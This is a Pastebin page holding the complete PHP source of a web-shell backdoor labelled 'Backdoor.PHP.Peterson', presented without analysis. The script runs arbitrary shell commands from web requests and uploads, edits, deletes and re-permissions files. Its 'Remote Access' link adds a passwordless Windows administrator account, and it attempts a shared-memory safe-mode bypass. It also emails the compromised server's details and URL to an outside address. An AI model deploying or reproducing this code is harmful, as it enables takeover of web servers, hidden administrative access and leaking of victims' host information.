API tools faq
paste
FlyFar

Backdoor.PHP.Peterson - Source Code

FlyFar
Jul 6th, 2023
131
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 21.67 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Language" content="pt-br">
  4. <meta name="GENERATOR" content="Microsoft FrontPage 5.0">
  5. <meta name="ProgId" content="AoD">
  6. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  7. <title>***BY PETERSON THE GREATEST CMD***</title>
  8. <style type="text/css">
  9. A:link {text-decoration:none}
  10. A:visited {text-decoration:none}
  11. A:hover {text-decoration:underline}
  12. A:active {text-decoration:underline}
  13. body,td {
  14.  font-family: verdana;
  15.  font-size: 8pt;
  16.  background-color: #FFCC00;
  17. }
  18. a{
  19.  color: #0000FF;
  20.  text-decoration: none;
  21. }
  22. a:hover {
  23.  color: #FF0000;
  24.  text-decoration: underline;
  25. }
  26. </style>
  27. </head>
  28. <body >
  29. <center><h2> --== by MS flood_  ==-- </h2></center>
  30. <?php
  31.  
  32.  @set_time_limit(0);
  33.  $string = $_SERVER['QUERY_STRING'];
  34.  $mhost = 'http://nodan.110mb.com/cmds.txt?';
  35.  $host_all = explode("$mhost", $string);
  36.  $s1 = $host_all[0];
  37.  $fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
  38.  $OS = @PHP_OS;
  39.  $IpServer = '127.0.0.1';
  40.  $UNAME = @php_uname();
  41.  $PHPv = @phpversion();
  42.  $SafeMode = @ini_get('safe_mode');
  43.  if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
  44.  else { $SafeMode = "<i>$SafeMode</i>"; }
  45.  $btname = '';
  46.  $bt = '';
  47.  $dc = '';
  48.  $newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup
  49. &quot;Administrators&quot; /add Admin;net localgroup &quot;Users&quot; /del Admin';
  50.  $bn = '';
  51. // Java Script
  52.  echo "<script type=\"text/javascript\">";
  53.  echo "function ChMod(chdir, file) {";
  54.  echo "var o = prompt('Chmod: - Contoh: 0777', '');";
  55.  echo "if (o) {";
  56.  echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file +
  57. '&chmod=' + o + \"\";";
  58.  echo "}";
  59.  echo "}";
  60.  echo "function Rename(chdir, file, mode) {";
  61.  echo "if (mode == 'edit') {";
  62.  echo "var o = prompt('Ganti Nama File '+ file + ' menjadi:', '');";
  63.  echo "}";
  64.  echo "else {";
  65.  echo "var o = prompt('Ganti Nama Folder '+ file + ' menjadi:', '');";
  66.  echo "}";
  67.  echo "if (o) {";
  68.  echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file +
  69. '&newname=' + o + '&mode=' + mode +\"\";";
  70.  echo "}";
  71.  echo "}";
  72.  echo "function Copy(chdir, file) {";
  73.  echo "var o = prompt('Copied for:', '/tmp/' + file);";
  74.  echo "if (o) {";
  75.  echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file +
  76. '&fcopy=' + o + \"\";";
  77.  echo "}";
  78.  echo "}";
  79.  echo "function Mkdir(chdir) {";
  80.  echo "var o = prompt('Nama Folder?', 'Folder_Baru');";
  81.  echo "if (o) {";
  82.  echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o +
  83. \"\";";
  84.  echo "}";
  85.  echo "}";
  86.  echo "function Newfile(chdir) {";
  87.  echo "var o = prompt('Nama File?', 'File_Baru.txt');";
  88.  echo "if (o) {";
  89.  echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o +
  90. \"\";";
  91.  echo "}";
  92.  echo "}";
  93.  echo "</script>";
  94.  // End JavaScript
  95.  /* Functions */
  96.  function cmd($CMDs) {
  97.   $CMD[1] = '';
  98.   exec($CMDs, $CMD[1]);
  99.   if (empty($CMD[1])) {
  100.    $CMD[1] = shell_exec($CMDs);
  101.   }
  102.    elseif (empty($CMD[1])) {
  103.    $CMD[1] = passthru($CMDs);
  104.   }
  105.   elseif (empty($CMD[1])) {
  106.    $CMD[1] = system($CMDs);
  107.   }
  108.   elseif (empty($CMD[1])) {
  109.    $handle = popen($CMDs, 'r');
  110.    while(!feof($handle)) {
  111.     $CMD[1][] .= fgets($handle);
  112.    }
  113.    pclose($handle);
  114.   }
  115.   return $CMD[1];
  116.  }
  117.  
  118. if (@$_GET['chdir']) {
  119.  $chdir = $_GET['chdir'];
  120. } else {
  121.    $chdir = getcwd()."/";
  122.   }
  123. if (@chdir("$chdir")) {
  124.  $msg = "<font color=\"#008000\"> Pintu Masuk ke Direktori, OK!</font>";
  125. } else {
  126.  $msg = "<font color=\"#FF0000\">Error: Gagal masukkan ke folder!</font>";
  127.  $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
  128. }
  129.  $chdir = str_replace(chr(92), chr(47), $chdir);
  130. if (@$_GET['action'] == 'upload') {
  131.  $uploaddir = $chdir;
  132.  $uploadfile = $uploaddir. $_FILES['userfile']['name'];
  133.  if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .
  134. $_FILES['userfile']['name'])) {
  135.   $msg = "<font color=\"#008000\"><font
  136. color=\"#000080\">{$_FILES['userfile']['name']}</font>, Upload File Berjaya.
  137. </font>";
  138.  } else {
  139.     $msg = "<font color=\"#FF0000\">Error: Upload File Gagal.</font>";
  140.    }
  141. }
  142. elseif (@$_GET['action'] == 'mkdir') {
  143.     $newdir = $_GET['newdir'];
  144.     if (@mkdir("$chdir"."$newdir")) {
  145.      $msg = "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>, folder
  146. berhasil dibuat. </font>";
  147.     } else {
  148.        $msg = "<font color=\"#FF0000\">Error: Pembuatan folder gagal.</font>";
  149.       }
  150. }
  151. elseif (@$_GET['action'] == 'newfile') {
  152.     $newfile = $_GET['newfile'];
  153.     if (@touch("$chdir"."$newfile")) {
  154.      $msg = "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>, berhasil
  155. dibuat! </font>";
  156.     } else {
  157.        $msg = "<font color=\"#FF0000\">Error: Tak Boleh Buat File!</font>";
  158.       }
  159. }
  160. elseif (@$_GET['action'] == 'del') {
  161.      $file = $_GET['file']; $type = $_GET['type'];
  162.      if ($type == 'file') {
  163.       if (@unlink("$chdir"."$file")) {
  164.        $msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, Berhasil
  165. menghapus arsip (file)!</font>";
  166.       } else {
  167.          $msg = "<font color=\"#FF0000\">Error: Gagal menghapuskan File (file)!</font>";
  168.         }
  169.      } elseif ($type == 'dir') {
  170.         if (@rmdir("$chdir"."$file")) {
  171.           $msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, Berhasil
  172. menghapus folder!</font>";
  173.         } else {
  174.            $msg = "<font color=\"#FF0000\">Error: Gagal menghapuskan folder!</font>";
  175.           }
  176.        }
  177. }
  178. elseif (@$_GET['action'] == 'chmod') {
  179.      $file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
  180.      if (@chmod ("$file", $chmod)) {
  181.  
  182.       $msg = "<font color=\"#008000\">Chmod dari</font> <font
  183. color=\"#000080\">{$_GET['file']}</font> <font color=\"#008000\">berubah menjadi</font>
  184. <font color=\"#000080\">$chmod</font> <font color=\"#008000\">: Sukses!</font>";
  185.      } else {
  186.         $msg = '<font color=\"#FF0000\">Error: Gagal mengubah chmod.</font>';
  187.        }
  188. }
  189. elseif (@$_GET['action'] == 'rename') {
  190.      $file = $_GET['file']; $newname = $_GET['newname'];
  191.      if (@rename("$chdir"."$file", "$chdir"."$newname")) {
  192.       $msg = "<font color=\"#008000\">Archive</font> <font color=\"#000080\">{$file}</font>
  193. <font color=\"#008000\">named for</font> <font color=\"#000080\">{$newname}</font> <font
  194. color=\"#008000\">successfully!</font>";
  195.      } else {
  196.         $msg = "<font color=\"#FF0000\">Error: Gagal menukar File.</font>";
  197.        }
  198. }
  199. elseif (@$_GET['action'] == 'copy') {
  200.     $file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
  201.     if (@copy("$file", "$copy")) {
  202.      $msg = "<font color=\"#000080\">{$file}</font>, <font color=\"#008000\">disalin
  203. menjadi</font> <font color=\"#000080\">{$copy}</font> <font color=\"#008000\">
  204. Berhasil!</font>";
  205.     } else {
  206.        $msg = "<font color=\"#FF0000\">Error: Gagal menyalin </font> <font
  207. color=\"#000000\">{$file}</font> <font color=\"#FF0000\">menjadi</font> <font
  208. color=\"#000000\">{$copy}</font></font>";
  209.       }
  210. }
  211. /* Parte Atualiza 02:48 12/2/2006 */
  212. elseif (@$_GET['action'] == 'cmd') {
  213.  if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
  214.  if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
  215.  $cmd = stripslashes(trim($cmd));
  216.  $result_arr = cmd($cmd);
  217.  
  218.  $afim = count($result_arr); $acom = 0; $msg = '';
  219.  $msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida
  220. Console';font-size: 12px;margin 2\">Hasil : <b>".$cmd."</b></p>";
  221.  if ($result_arr) {
  222.   while ($acom <= $afim) {
  223.    $msg .= "<p style=\"color: #008000;text-align: left;font-family:
  224. 'Lucida Console';font-size: 12px;margin 2\"> ".@$result_arr[$acom]."</p>";
  225.   $acom++;
  226.    }
  227.  }
  228.  else {
  229.   $msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida
  230. Console';font-size: 12px;margin 2\">Error: Gagal Menjalankan perintah.</p>";
  231.  }
  232. }
  233. elseif (@$_GET['action'] == 'safemode') {
  234. if (@!extension_loaded('shmop')) {
  235.  echo "Loading... module</br>";
  236.     if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
  237.         @dl('php_shmop.dll');
  238.     } else {
  239.         @dl('shmop.so');
  240.     }
  241. }
  242. if (@extension_loaded('shmop')) {
  243.  echo "Module: <b>shmop</b> loaded!</br>";
  244.  $shm_id = @shmop_open(0xff2, "c", 0644, 100);
  245.  if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
  246.  $data="\x00";
  247.  $offset=-3842685;
  248.  $shm_bytes_written = @shmop_write($shm_id, $data, $offset);
  249.  if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of
  250. data\n"; }
  251.  if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
  252.  echo passthru("id");
  253.  shmop_close($shm_id);
  254.  
  255. } else { echo "Module: <b>shmop</b> tidak dimuat!</br>"; }
  256. }
  257. elseif (@$_GET['action'] == 'zipen') {
  258.  $file = $_GET['file'];
  259.  $zip = @zip_open("$chdir"."$file");
  260.  $msg = '';
  261. if ($zip) {
  262.     while ($zip_entry = zip_read($zip)) {
  263.         $msg .= "Name:               " . zip_entry_name($zip_entry) . "\n";
  264.         $msg .= "Actual Filesize:    " . zip_entry_filesize($zip_entry) . "\n";
  265.         $msg .= "Compressed Size:    " . zip_entry_compressedsize($zip_entry) . "\n";
  266.         $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n";
  267.         if (zip_entry_open($zip, $zip_entry, "r")) {
  268.             echo "File Contents:\n";
  269.             $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
  270.             echo "$buf\n";
  271.             zip_entry_close($zip_entry);
  272.         }
  273.         echo "\n";
  274.     }
  275.     zip_close($zip);
  276. }
  277. }
  278. elseif (@$_GET['action'] == 'edit') {
  279.  $file = $_GET['file'];
  280.  $conteudo = '';
  281.  $filename = "$chdir"."$file";
  282.  $conteudo = @file_get_contents($filename);
  283.  $conteudo = htmlspecialchars($conteudo);
  284.  $back = $_SERVER['HTTP_REFERER'];
  285.  echo "<p align=\"center\">Editing {$file} ...</p>";
  286.  echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:
  287. collapse\" width=\"100%\" id=\"editacao\">";
  288.  echo "<tr>";
  289.  echo "<td width=\"100%\">";
  290.  echo "<form method=\"POST\"
  291. action=\"{$fstring}&amp;action=save&amp;chdir={$chdir}&amp;file={$file}\">";
  292.  echo "<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\"
  293. s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">";
  294.  print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana;
  295. font-size: 8pt; border: 1px solid #000000\">{$conteudo}</textarea></p>";
  296.  echo "<p align=\"center\">";
  297.  echo "<input type=\"submit\" value=\"Simpan\" name=\"B2\" style=\"  border: 1px solid
  298. #000000\"> ";
  299.  echo "<input type=\"button\" value=\"Tutup\"
  300. Onclick=\"javascript:window.location='{$fstring}&amp;chdir={$chdir}'\" name=\"B1\" style=\"  
  301. border: 1px solid #000000\"> ";
  302.  echo "</form>";
  303.  echo "</td>";
  304.  echo "</tr>";
  305.  echo "</table>";
  306. }
  307. elseif (@$_GET['action'] == 'save') {
  308.    $filename = "$chdir".$_GET['file'];
  309.    $somecontent = $_POST['S1'];
  310.    $somecontent = stripslashes(trim($somecontent));
  311.    if (is_writable($filename)) {
  312.     @$handle = fopen ($filename, "w");
  313.     @$fw = fwrite($handle, $somecontent);
  314.     @fclose($handle);
  315.     if ($handle && $fw) {
  316.      $msg = "<font color=\"#000080\">{$_GET['file']}</font>, <font
  317. color=\"#008000\">berhasil diedit!</font>";
  318.     }
  319.  } else {
  320.     $msg = "<font color=\"#000000\">{$_GET['file']},</font> <font color=\"#FF0000\">tidak
  321. bisa ditulisi!</font>";
  322.    }
  323. }
  324. // Informaçs
  325.  $cmdget = '';
  326.  if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
  327.  if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
  328.  $cmdget = htmlspecialchars($cmdget);
  329.  function asdads() {
  330.   $asdads = '';
  331.   if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
  332.   if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
  333.   if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
  334.   if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
  335.   if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
  336.   return $asdads;
  337.  }
  338. echo "<form method=\"POST\" name=\"cmd\"
  339. action=\"{$fstring}&amp;action=cmd&amp;chdir=$chdir\">";
  340. echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
  341. echo "<legend>Informasi</legend>";
  342. echo "<br><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:
  343. collapse; font-family: Verdana; font-size: 10px\" width=\"100%\">";
  344. echo "<tr>";
  345. echo "<td width=\"8%\">";
  346. echo " <b>Sistem </b> </td> ";
  347. echo "<td width=\"92%\">: {$OS}</td>";
  348. echo "</tr>";
  349. echo "<tr>";
  350. echo "<td width=\"8%\">";
  351. echo " <b>Nama </b></td> ";
  352. echo "<td width=\"92%\">: {$UNAME}</td>";
  353. echo "</tr>";
  354. echo "<tr>";
  355. echo "<td width=\"8%\">";
  356. echo " <b>PHP </b></td> ";
  357. echo "<td width=\"92%\">: {$PHPv}, <b> Safe Mode :</b> {$SafeMode}</td>";
  358. echo "</tr>";
  359.  if (strtoupper(substr($OS, 0,3) != 'WIN')) {
  360.   $Methods = asdads();
  361.   if ($Methods == '') { $Methods = "???"; }
  362.   echo "<tr>";
  363.   echo "<td width=\"8%\">";
  364.   echo "<b>Methods </b></td> ";
  365.   echo "<td width=\"92%\">: {$Methods}</td>";
  366.   echo "</tr>";
  367.  }
  368. echo "<tr>";
  369. echo "<td width=\"8%\">";
  370. echo " <b>IP </b></td> ";
  371. echo "<td width=\"92%\">: {$IpServer}</td>";
  372. echo "</tr>";
  373. echo "<tr>";
  374. echo "<td width=\"8%\">";
  375. echo " <b>Perintah </b></td> ";
  376. echo "<td width=\"92%\">: <input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\"
  377. style=\" font-size: 8 pt; border: 1px solid #000000\"> <input type=\"submit\"
  378. name=\"action\" value=\"Kirim\" style=\" font-size: 8 pt; border: 1px solid
  379. #000000\"></td>";
  380. echo "</tr>";
  381. echo "</table><br>";
  382. echo "</fieldset></form>";
  383. // Dir
  384. echo "<form method=\"POST\" action=\"{$fstring}&amp;action=upload&amp;chdir=$chdir\"
  385. enctype=\"multipart/form-data\">";
  386. echo "<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\"
  387. s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid
  388. #000000; padding: 2\">";
  389. if (is_writable("$chdir")) {
  390.  if (strtoupper(substr($OS, 0,3) == 'WIN')) {
  391.   echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\"
  392. onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
  393. onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
  394. href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd=$newuser\">Remote
  395. Access</a></legend>";
  396.  } else {
  397.     echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\"
  398. onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
  399. onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
  400. href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=yes\">Kembali</a></legend
  401. >";
  402.    }
  403. }
  404. else {
  405. if (strtoupper(substr($OS, 0,3) == 'WIN')) {
  406.   echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\"
  407. onclick=\"Mkdir('{$chdir}');\">Foldr Baru</a> | <a href=\"#[New File]\"
  408. onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
  409. href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd={$newuser}\">Remote
  410. Access</a></legend>";
  411.  } else {
  412.     echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\"
  413. onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
  414. onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
  415. href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=no\">Kembali</a></legend>
  416. ";
  417.    }
  418. }
  419. if (@!$handle = opendir("$chdir")) {
  420.  echo " Gue gak bisa masuk folder, <a href=\"{$fstring}\">Klik sini!</a> untuk Kembali ke folder ori!</br>";
  421. }
  422. else {
  423. echo "  <table border=\"0\" cellpadding=\"5\" cellspacing=\"0\" width=\"100%\">";
  424. echo "    <tr>";
  425. echo "      <td width=\"100%\" colspan=\"4\"> Upload:";
  426. echo "      <input type=\"file\" name=\"userfile\" size=\"65\" style=\"  border-style:
  427. solid; border-width: 1\">";
  428. echo "      <input type=\"submit\" value=\"Kirim\" name=\"B1\" style=\" border: 1px solid
  429. #000000\"></td>";
  430. echo "    </tr>";
  431. echo "    <tr>";
  432. echo "      <td width=\"100%\" colspan=\"4\"> </td>";
  433. echo "    </tr>";
  434. echo "    <tr>";
  435. echo "      <td width=\"100%\" colspan=\"4\">";
  436. if (@!$msg) {
  437.  echo "      <p align=\"left\">Messages</td>";
  438. } else {
  439.    echo "      <p align=\"left\">$msg</td>";
  440.   }
  441. echo "    </tr>";
  442. echo "    <tr>";
  443. echo "      <td width=\"100%\" colspan=\"4\"> </td>";
  444. echo "    </tr></table> ";
  445. echo "   <table border=\"1\" cellpadding=\"2\" cellspacing=\"0\" width=\"100%\">";
  446. echo "    <tr bgcolor=\"#FF6600\" align=\"center\"> ";
  447. echo "      <td > Permision</td>";
  448. echo "      <td > Nama File </td>";
  449. echo "      <td > Kapasiti </td>";
  450. echo "      <td > Perintah</td>";
  451. echo "     </tr>";
  452. $colorn = 0;
  453.     while (false !== ($file = readdir($handle))) {
  454.         if ($file != '.') {
  455.             if ($colorn == 0) {
  456.              $color = "style=\"background-color: #FF9900\"";
  457.             }
  458.             elseif ($colorn == 1) {
  459.              $color = "style=\"background-color:  #FFCC33\"";
  460.             }        
  461.             if (@is_dir("$chdir"."$file")) {
  462.              $file = $file.'/';
  463.              $mode = 'chdir';
  464.             } else {
  465.                $mode = 'edit';
  466.              }
  467.             if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
  468.               $chdir .= '/';
  469.             }
  470.             if ($file == '../') {
  471.              $lenpath = strlen($chdir); $baras = 0;
  472.              for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
  473.              $chdir_ = explode("/", $chdir);
  474.              $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
  475.             }
  476.             $perms = @fileperms ("$chdir"."$file");
  477.             if ($perms == '') {
  478.              $perms = '???';
  479.             }
  480.             $size = @filesize ("$chdir"."$file");
  481.             $size = $size / 1024;
  482.             $size = explode(".", $size);
  483.             if (@$size[1] != '') {
  484.              $size = $size[0].'.'.@substr("$size[1]", 0, 2);
  485.             } else {
  486.                $size = $size[0];
  487.              }
  488.             if ($size == 0) {
  489.              if ($mode == 'chdir') {
  490.               $size = '???';
  491.              }
  492.             }
  493.             echo "<tr>";
  494.      echo "<td align=\"center\" $color> $perms</td>";
  495.             if (@is_writable ("$chdir"."$file")) {
  496.              if ($mode == 'chdir') {
  497.               if ($file == '../') {
  498.                echo "<td $color> <b><a href=\"{$fstring}&amp;chdir=$chdirpox\"><font
  499. color=\"#008000\">$file</font></a></b> </td>";
  500.               } else {
  501.                  echo "<td $color> <b><a href=\"{$fstring}&amp;chdir={$chdir}{$file}\"><font
  502. color=\"#008000\">$file</font></a> </b></td>";                
  503.                 }
  504.              } else {
  505.   if (is_readable("$chdir"."$file")) {
  506.                  echo "<td $color> <a
  507. href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a> </td>";
  508.                 } else {
  509.                    echo "<td $color> $file </td>";
  510.                   }
  511.                }
  512.             }
  513.            else {
  514.              if ($mode == 'chdir') {
  515.               if ($file == '../') {
  516.                echo "<td $color> <a href=\"{$fstring}&amp;chdir=$chdirpox\">$file</a>
  517. </td>";
  518.               } else {
  519.                  echo "<td $color> <a
  520. href=\"{$fstring}&amp;chdir={$chdir}{$file}\">$file</a></td>";                
  521.                }
  522.              } else {
  523.   if (@is_readable("$chdir"."$file")) {
  524.                  echo "<td  $color> <a
  525. href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a> </td>";
  526.                 } else {
  527.                    echo "<td $color> $file</td>";
  528.                  }
  529.                }
  530.              }
  531.             echo "<td align=\"right\" $color> $size KB</td>";
  532.             if ($mode == 'edit') {
  533.              echo "<td align=\"center\" $color> <a href=\"#{$file}\"
  534. onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">Rename</a> | <a
  535. href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=file\">Del</a>
  536. | <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">Chmod</a> | <a href=\"#{$file}\"
  537. onclick=\"Copy('{$chdir}', '{$file}')\">Copy</a> </td>";
  538.             } else {
  539.                echo "<td align=\"center\" $color> <a href=\"#{$file}\"
  540. onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">Rename</a> | <a
  541. href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=dir\">Del</a>
  542. | <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">Chmod</a> | Copy </td>";
  543.               }  
  544.             echo "</tr>";
  545.             if ($colorn == 0) {
  546.              $colorn = 1;
  547.             }
  548.             elseif ($colorn == 1) {
  549.              $colorn = 0;
  550.             }
  551.         }
  552.     }
  553.     closedir($handle);
  554. }
  555.   $OS = @PHP_OS;
  556.   $UNAME = @php_uname();
  557.   $PHPv = @phpversion();
  558.   $SafeMode = @ini_get('safe_mode');
  559.  
  560.   if ($SafeMode == '') { $SafeMode = "<i>OFF</i><BR>"; }
  561.   else { $SafeMode = "<i>$SafeMode</i><BR>"; }
  562.  
  563.    
  564.   $injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
  565.   $psn=("OS = " . $OS . "<BR>UNAME = " . $UNAME . "<BR>PHPVersion = " . $PHPv . "<BR>Safe
  566. Mode = " . $SafeMode . "<BR><font color=blue>http://" . $injek . "</font><BR>Ingat jangan
  567. Guna Target Ini.<BR>By: MSN PEBA");
  568.  
  569.   $header = "From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To: $replyto\r\n";
  570.   $header .= "MIME-Version: 1.0\r\n";
  571.   If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
  572.   If ($file_name) $header .= "--$uid\r\n";
  573.   $header .= "Content-Type: text/$contenttype\r\n";
  574.   $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
  575.   $header .= "$message\r\n";
  576.   If ($file_name) $header .= "--$uid\r\n";
  577.   If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
  578.   If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
  579.   If ($file_name) $header .= "Content-Disposition: attachment;
  580. filename=\"$file_name\"\r\n\r\n";
  581.   If ($file_name) $header .= "$content\r\n";
  582.   If ($file_name) $header .= "--$uid--";
  583.   $to = ("arms27@fdfrr.com");
  584.   $subject = ("Hajar bos");
  585.   mail($to,$subject,$psn,$header);
  586. @include "$bn";
  587. ?>
  588.   </table>
  589.   </fieldset></form>
  590. </div>
  591. </body>
  592. </html>
Tags: php Backdoor
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!